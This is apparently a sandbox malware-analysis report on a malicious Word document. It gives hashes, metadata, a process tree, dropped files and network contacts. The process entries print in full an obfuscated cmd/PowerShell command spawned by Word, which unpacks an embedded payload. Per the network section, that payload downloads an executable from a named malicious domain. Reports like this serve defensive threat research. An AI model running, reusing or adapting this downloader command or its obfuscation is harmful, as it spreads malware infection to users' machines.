File name: | 4_RgNr-N5O4782-33.doc |
Full analysis: | https://app.any.run/tasks/4e3c7caf-4b58-4c29-8e31-09d95dba003c |
Verdict: | Malicious activity |
Analysis date: | April 23, 2019, 14:50:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Eli-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 12 06:51:00 2018, Last Saved Time/Date: Mon Nov 12 06:51:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 469BBF236645D95A124B8334C2676683 |
SHA1: | 77E0B39C59B4B50AE6B9AA21BEE455EB8291C7AA |
SHA256: | D1FD5301FAA9C42AC954DFDBF5BD4D79A8D569845FF174C08BBCDC3B0D76176F |
SSDEEP: | 1536:pU79ocn1kp59gxBK85fBt+a9Op3pX3M3e99NFHCVzlY1AFnjkW:l41k/W48K3pX3M3e99NFHCVzlY1AFnjk |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:12 06:51:00 |
CreateDate: | 2018:11:12 06:51:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Eli-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
612 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4_RgNr-N5O4782-33.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3816 | CMD /c Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." ; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1792 | Cmd /C "sEt DIy=$8230C =[CHaR[]] ") )93]rAHC[,)84]rAHC[+701]rAHC[+28]rAHC[(EcaLPErC- 63]rAHC[,'Q8h' EcaLPErC-421]rAHC[,)99]rAHC[+411]rAHC[+201]rAHC[( EcaLPErC-)'nOi'+'ss'+'eR'+'pXE-ekOVNI '+'crf)(Dn'+'eoTda'+'ER.)'+'})'+'iI'+'cS'+'A::'+']Gn'+'IDoCNE'+'.txE'+'t'+'.mE'+'T'+'s'+'YS[ , '+'_Q8h'+' '+'(REDA'+'ErmAe'+'r'+'t'+'S.oi '+'TcEJBO-WEn {'+' tC'+'E'+'jBO'+'-hcAe'+'Ro'+'f '+'crf'+' )'+'s'+'SERp'+'M'+'O'+'CED'+'::'+']EdOm'+'NoIS'+'SErp'+'m'+'O'+'c.noiss'+'erPmoc'+'.Oi[, '+')'+'0kR'+'=='+'wf0gt'+'4jn'+'5w'+'plE'+'56'+'j'+'u'+'T6'+'l'+'U'+'y8Thm'+'dN'+'Rp'+'Y'+'bFvu'+'a'+'GcUFpNDv'+'i'+'S'+'aiRLaT3RXf5'+'R62j'+'22Tq'+'8'+'9'+'yO00xFYyxWaA'+'a'+'PAh/'+'+eeB'+'+'+'/PwGy7wuuEMUTe'+'JCm3c'+'7'+'dD'+'D'+'Nv'+'v0E6'+'ly'+'9'+'A'+'B'+'fdSW9'+'xBKUu'+'DeMT4'+'rPe6id'+'+'+'JMV'+'C2TkqV/f'+'x'+'b'+'a'+'Ky+'+'XLxam'+'q1'+'vrVSpZnJ+Z'+'x0HZ5X'+'N+WpMXQhxM5iSysve+L/J+yhlz'+'6Tt'+'VOy'+'g'+'Ahuy'+'KymQon8'+'J'+'cE7vWmI'+'Gm'+'vhI'+'siwMIrg'+'0'+'Ai'+'LMxX10'+'Vyjy'+'TnY'+'G'+'3E'+'wE'+'UCsEZ6yMT'+'sET'+'nT'+'4Jb'+'nj'+'w'+'ELS'+'5UEl2J'+'syPY9iggb2'+'84'+'aR'+'9bW'+'+Q'+'QN/'+'xtcw'+'J7W'+'++e'+'6b'+'C'+'ZcX'+'/QOmbOaruL'+'vV'+'uK9FG'+'UGBKISY'+'Y'+'QtENgqfNb'+'JIFa6hy/XI'+'FwI8TRBZ'+'P0'+'kR '+'(GNiRt'+'s46E'+'SABMorf:'+':]'+'T'+'REvn'+'OC'+'[]MaEr'+'tSy'+'roMe'+'m'+'.oi.METsys'+'['+' '+'(mAERtSE'+'tAlFe'+'D.'+'N'+'OisSErpM'+'o'+'c.Oi'+'.mETsys'+' Tc'+'EJ'+'B'+'O-'+'WEn ( '(( ()''nIOJ-]2,11,3[EmAN.)'*rDM*' eLbAirav-Teg(( ." ; [ARrAY]::ReveRSE( ( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue); [stRiNG]::jOIn( '' ,( chILDItem ("V"+"ariA"+"b"+"lE:"+"8230C") ).vAlue )^|^& ( $veRbOsePrEFerENCe.TOsTRiNG()[1,3]+'x'-JOIn'')&& PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) )" | C:\Windows\system32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2104 | PowERsheLl SEt-ItEm ('V' + 'ARiAb'+'lE:SKeAil') ( [TYPe]( \"{2}{3}{1}{0}\"-F't','n','ENvIRon','ME' ) ) ; ( .('ls') ( \"{4}{0}{7}{1}{5}{2}{3}{6}\"-f'B','E:E','co','NteX','VarIA','XEcUTiOn','t','l') ).\"VaL`UE\".\"iN`VO`k`eCom`MANd\".( \"{3}{1}{2}{0}\" -f 'ipT','oke','SCr','inv' ).Invoke( ( ${sK`E`AiL}::(\"{0}{4}{1}{2}{5}{3}\" -f'get','ONMeNt','v','E','Envir','arIaBL').Invoke( 'DiY',(\"{1}{0}\"-f's','PrOCeS' ))) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1360 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 255 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
612 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5C73.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\811L7QKX2CMYS4OTX88M.temp | — | |
MD5:— | SHA256:— | |||
1360 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7386.tmp | — | |
MD5:— | SHA256:— | |||
1360 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7396.tmp | — | |
MD5:— | SHA256:— | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
612 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$RgNr-N5O4782-33.doc | pgc | |
MD5:29353B7716ADF3DCF88EEC19942BE3F5 | SHA256:612AF684941F1C82498646B34CA9ABCF815F8F97AC4E660C5D4545C661423BBA | |||
612 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:825C45DD10C96600B19CB23B108C989D | SHA256:7C821062FDC859ADBA6F62E919301188567AB7912FBA2458B8EC3C72FE0F88DB | |||
2104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe6a00.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2104 | powershell.exe | C:\Users\admin\AppData\Local\Temp\431.exe | html | |
MD5:AFC83AE7C4EA82B533D9B8731AAB3E80 | SHA256:FDF900267092BC67BD7786B86C462E69F9ED52BED838809B6BA28B298BE879F6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2104 | powershell.exe | GET | 302 | 143.95.78.251:80 | http://craniofacialhealth.com/fkwoBvLXu9 | US | html | 239 b | malicious |
2104 | powershell.exe | GET | 200 | 143.95.78.251:80 | http://craniofacialhealth.com/cgi-sys/suspendedpage.cgi | US | html | 7.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2104 | powershell.exe | 143.95.78.251:80 | craniofacialhealth.com | Colo4, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
craniofacialhealth.com |
| malicious |